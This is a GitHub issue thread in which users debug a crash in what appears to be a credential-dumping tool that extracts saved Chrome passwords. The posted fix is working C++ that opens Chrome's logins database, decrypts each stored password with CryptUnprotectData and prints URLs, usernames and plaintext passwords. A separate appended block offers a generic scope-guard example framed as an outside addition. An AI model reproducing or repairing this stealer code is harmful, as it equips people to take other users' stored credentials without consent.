Google Chrome Credentials Breaks after first attempt #2

Open
filipe-valadares opened this issue Jan 29, 2019 · 7 comments
@filipe-valadares

Everything ran perfectly until it reached the second password form of Chrome, which crashes the software.
After removing a break point in the code, the software could reach the third password, showing only a character in the URL form. After that, it crashed again.

@filipe-valadares filipe-valadares changed the title Google Chrome Credentials Breaks after first attemp Google Chrome Credentials Breaks after first attempt Jan 29, 2019
@maldevel
Contributor

Hi,
could you please send me the name of the source file and the exact line of code where the application crashes?

@Crash0v3r1de

I imagine he/she is referring to `iosfwd` line 464
`return (_CSTD strlen(_First));`

After the first row in the for loop in libchrome.cpp my VS throws the exception when that line is hit. I'm stupidly new to C++ (usually code in C#) and I'm trying to break down the process, but it appears this is causing the Chrome issue and I don't know how to understand the whole process/function leading up to the actual error itself.
Screenshot - http://prntscr.com/nqopyr

@maldevel
Contributor

Thx I will check it out.

@Crash0v3r1de

I'll be monitoring this for any updates. I'm curious what the issue is and what the code change will be. Trying to learn C++, and the debugging system for something like this is basically nothing I can understand yet. I think it's related to sqlite but I'm probably wrong lol.

@Crash0v3r1de

Crash0v3r1de commented May 24, 2019

Just a random thing I found during more step-by-step debugging, breaking down what the code does. It looks like when it's outputting the URL result char it cannot convert, I think?
`std::cout << "URL: " << results[cellPosition] << std::endl;` hits the second time around and then throws the read access violation.

So for my second loop the URL cell position int is 6
`int cellPosition = (rowCtr * columns);`
which in the debugger returns "", which I would assume means null?
I've added an `if(results[cellPosition] != nullptr)` to check but it passes that validation.

I also was fooling around with try catch blocks and oddly enough those didn't catch it either. I feel like I'm missing something trying to fix/find a fix for it.

This is the output before the binary crashes:
```
URL: Γ9÷φ�
Username:
```
EDIT: it will also sometimes show the correct URL in console but still will fail after username second loop around.

Sorry if this doesn't help but I figured I would share it ¯_(ツ)_/¯

@ContionMig

The error seems to come from `sqlite3_free_table(results);`. Removing it fixes it temporarily.

@quantumcore

The issue is fixed by moving `sqlite3_free_table(results);` outside the for loop.

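```cpp
// results is the flat array from sqlite3_get_table(): row 0 holds the column
// names, so cell (row, col) is results[row * columns + col].
for (int rowCtr = 1; rowCtr <= rows; ++rowCtr) {
    int cellPosition = (rowCtr * columns);
    std::cout << "URL: " << results[cellPosition] << std::endl;
    cellPosition = (rowCtr * columns) + 1;
    std::cout << "Username: " << results[cellPosition] << std::endl;
    cellPosition = (rowCtr * columns) + 2;

    if ((rc = sqlite3_blob_open(db, "main", "logins", "password_value", rowCtr, 0, &blob)) != SQLITE_OK) {
        sqlite3_free_table(results);  // release the table on early exit too
        sqlite3_close(db);
        return;
    }

    int len = 0;
    if ((len = sqlite3_blob_bytes(blob)) <= 0) {
        sqlite3_blob_close(blob);
        sqlite3_free_table(results);
        sqlite3_close(db);
        return;
    }

    if ((block = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, len)) == NULL) {
        sqlite3_blob_close(blob);
        sqlite3_free_table(results);
        sqlite3_close(db);
        return;
    }

    if ((rc = sqlite3_blob_read(blob, block, len, 0)) != SQLITE_OK) {
        HeapFree(GetProcessHeap(), 0, block);
        sqlite3_blob_close(blob);
        sqlite3_free_table(results);
        sqlite3_close(db);
        return;
    }

    sqlite3_blob_close(blob);

    DataIn.cbData = len;
    DataIn.pbData = (BYTE *)block;

    if (CryptUnprotectData(&DataIn, NULL, NULL, NULL, NULL, 0, &DataOut)) {
        // DataOut.pbData holds exactly cbData bytes; write that many instead of
        // storing a terminator one byte past the end of the buffer.
        std::cout << "Password: ";
        std::cout.write((const char *)DataOut.pbData, DataOut.cbData) << std::endl;
        LocalFree(DataOut.pbData);  // buffer allocated by CryptUnprotectData
    }

    HeapFree(GetProcessHeap(), 0, block);  // per-row blob copy
}

// Free the table once, after the last row has been read.
sqlite3_free_table(results);
```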
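The ownership rule behind this fix, as an added example that is not code from the project or from any commenter: the result table must outlive every cell read, so a scope guard releases it exactly once on any exit path. `make_table` and `free_table` are hypothetical stand-ins for `sqlite3_get_table()` and `sqlite3_free_table()` (assumed to share the flat layout with the header row first), and the sample rows are constructed.

```cpp
#include <cstdint>
#include <cstdlib>
#include <cstring>
#include <memory>
#include <string>
#include <vector>

static int g_frees = 0;  // number of times the table was released

// Stand-in for sqlite3_get_table(): flat array of (rows + 1) * columns cells,
// column names first, nullptr for SQL NULL. The slot just before the returned
// pointer keeps the cell count for free_table().
static char **make_table(const std::vector<const char *> &cells) {
    char **raw = static_cast<char **>(std::calloc(cells.size() + 1, sizeof(char *)));
    raw[0] = reinterpret_cast<char *>(static_cast<std::uintptr_t>(cells.size()));
    for (std::size_t i = 0; i < cells.size(); ++i) {
        if (cells[i] == nullptr) continue;
        raw[i + 1] = static_cast<char *>(std::malloc(std::strlen(cells[i]) + 1));
        std::strcpy(raw[i + 1], cells[i]);
    }
    return raw + 1;
}

// Stand-in for sqlite3_free_table(): every cell pointer is dangling afterwards.
static void free_table(char **table) {
    char **raw = table - 1;
    std::size_t n = reinterpret_cast<std::uintptr_t>(raw[0]);
    for (std::size_t i = 1; i <= n; ++i) std::free(raw[i]);
    std::free(raw);
    ++g_frees;
}

// The guard owns the table for the whole loop and releases it exactly once,
// on every exit path (normal end, early return, exception).
using TableGuard = std::unique_ptr<char *, void (*)(char **)>;

// Copies column `col` of every data row; row 0 is the header row.
static std::vector<std::string> read_column(char **results, int rows, int columns, int col) {
    TableGuard guard(results, free_table);
    std::vector<std::string> out;
    for (int rowCtr = 1; rowCtr <= rows; ++rowCtr) {
        const char *cell = results[rowCtr * columns + col];
        out.emplace_back(cell ? cell : "(null)");  // NULL cell: never stream it raw
    }
    return out;  // strings were copied, so they outlive the table
}
```

With the real library the same guard would take `sqlite3_free_table` as its deleter, which also removes the need to repeat the free call before each early `return`.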
